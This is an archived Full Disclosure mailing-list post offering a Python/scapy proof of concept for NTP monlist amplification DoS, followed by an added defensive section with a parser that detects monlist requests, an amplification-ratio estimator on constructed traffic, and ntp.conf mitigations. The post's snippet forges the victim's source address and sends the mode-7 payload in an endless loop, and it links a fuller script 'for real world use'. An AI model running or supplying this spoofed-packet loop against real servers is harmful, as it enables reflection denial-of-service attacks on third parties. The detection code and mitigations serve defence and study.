Full Disclosure mailing list archives

A more robust POC for the ntp amplification dos


From: rai () openmailbox org
Date: Wed, 16 Jul 2014 09:20:00 +0000

Hi,

Even though the NTP amplification attacks are old, and there are
plenty of scripts for checking if vulnerable (e.g. the nmap NSE script
ntp-mon), I had trouble finding a good example script that actually
exploited the vuln as would be done in the wild.

Eventually I edited a partially written script written by multiple
authors. Since it is in Python and uses scapy, the key part of the
exploit is as simple as:

data = "\x17\x00\x03\x2a" + "\x00" * 4
...
packet = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data)
send(packet,loop=1)

For real world use, just add some boilerplate threading to taste:

http://maker.fea.st/ntpamp.py

--
rai
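The eight bytes in the post are an NTP mode 7 "private" request whose request code 42 (0x2a) asks the server for its monlist, and the reply is many times larger than the request, which is what makes the server usable as a reflector. The following is an added example for the defensive side, not code from the post or from the linked script: it decodes the mode 7 header in pure Python (no scapy), flags monlist requests, and estimates the amplification ratio per client/server pair from a set of datagrams. The datagrams, addresses (RFC 5737 documentation ranges) and entry counts below are constructed; the header layout follows ntpd's ntp_request.h.

```python
"""
Detect NTP mode-7 "monlist" traffic (the primitive behind NTP amplification)
and estimate the amplification ratio per client/server pair.
Pure Python, no scapy needed; all sample datagrams below are constructed.
"""
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

MODE_PRIVATE = 7          # NTP mode 7: implementation-specific "private" requests
IMPL_XNTPD = 3            # implementation number used by ntpd
REQ_MON_GETLIST = 20      # legacy monlist request code
REQ_MON_GETLIST_1 = 42    # monlist request code (0x2a) used in the post's payload
MONLIST_CODES = {REQ_MON_GETLIST, REQ_MON_GETLIST_1}


@dataclass
class PrivateHeader:
    response: bool       # R bit: set on replies from the server
    more: bool           # M bit: more reply packets follow
    version: int
    sequence: int
    implementation: int
    request_code: int
    num_items: int
    item_size: int


def parse_private_header(payload: bytes) -> Optional[PrivateHeader]:
    """Decode the 8-byte mode-7 header; return None for any other NTP mode."""
    if len(payload) < 8:
        return None
    b0, b1, impl, req, err_items, mbz_size = struct.unpack("!BBBBHH", payload[:8])
    if (b0 & 0x07) != MODE_PRIVATE:
        return None
    return PrivateHeader(
        response=bool(b0 & 0x80),
        more=bool(b0 & 0x40),
        version=(b0 >> 3) & 0x07,
        sequence=b1 & 0x7F,
        implementation=impl,
        request_code=req,
        num_items=err_items & 0x0FFF,   # low 12 bits; high 4 bits are the error field
        item_size=mbz_size & 0x0FFF,    # low 12 bits; high 4 bits must be zero
    )


def is_monlist_request(payload: bytes) -> bool:
    """True for an unauthenticated client-side monlist query (codes 20 or 42)."""
    h = parse_private_header(payload)
    return h is not None and not h.response and h.request_code in MONLIST_CODES


@dataclass
class Datagram:
    src: str
    dst: str
    sport: int
    dport: int
    payload: bytes


def amplification_report(datagrams: List[Datagram]) -> Dict[Tuple[str, str], float]:
    """Bytes the NTP server sent back divided by bytes in the monlist requests,
    keyed by (client, server). A ratio well above 1 means the server answers
    monlist and can be abused as a reflector."""
    req_bytes: Dict[Tuple[str, str], int] = {}
    resp_bytes: Dict[Tuple[str, str], int] = {}
    for d in datagrams:
        h = parse_private_header(d.payload)
        if h is None or h.request_code not in MONLIST_CODES:
            continue
        if not h.response and d.dport == 123:
            key = (d.src, d.dst)
            req_bytes[key] = req_bytes.get(key, 0) + len(d.payload)
        elif h.response and d.sport == 123:
            key = (d.dst, d.src)
            resp_bytes[key] = resp_bytes.get(key, 0) + len(d.payload)
    return {k: resp_bytes.get(k, 0) / v for k, v in req_bytes.items()}


# --- constructed sample traffic (not a real capture) -------------------------
def _build_private(response: bool, more: bool, request_code: int,
                   num_items: int = 0, item_size: int = 0, seq: int = 0) -> bytes:
    b0 = (0x80 if response else 0) | (0x40 if more else 0) | (2 << 3) | MODE_PRIVATE
    hdr = struct.pack("!BBBBHH", b0, seq & 0x7F, IMPL_XNTPD, request_code,
                      num_items & 0x0FFF, item_size & 0x0FFF)
    return hdr + b"\x00" * (num_items * item_size)   # zero-filled entries


SAMPLE_REQUEST = _build_private(False, False, REQ_MON_GETLIST_1)   # 8 bytes
SAMPLE_DATAGRAMS = [
    Datagram("203.0.113.5", "198.51.100.10", 48947, 123, SAMPLE_REQUEST),
    Datagram("198.51.100.10", "203.0.113.5", 123, 48947,
             _build_private(True, True, REQ_MON_GETLIST_1, 6, 72, 0)),
    Datagram("198.51.100.10", "203.0.113.5", 123, 48947,
             _build_private(True, False, REQ_MON_GETLIST_1, 6, 72, 1)),
]

if __name__ == "__main__":
    print(parse_private_header(SAMPLE_REQUEST))
    for (client, server), ratio in amplification_report(SAMPLE_DATAGRAMS).items():
        print(f"{server} answered {client} with {ratio:.0f}x the request bytes")
```

The constructed request byte-for-byte equals the post's "\x17\x00\x03\x2a" + four NUL bytes, so the parser can be pointed at a real pcap payload unchanged. On the server side the fix is in ntp.conf: `disable monitor` stops monlist replies, and `restrict default kod nomodify notrap nopeer noquery` refuses mode 6/7 queries from arbitrary sources; re-running the report against traffic to a fixed server should show no response bytes at all.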

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

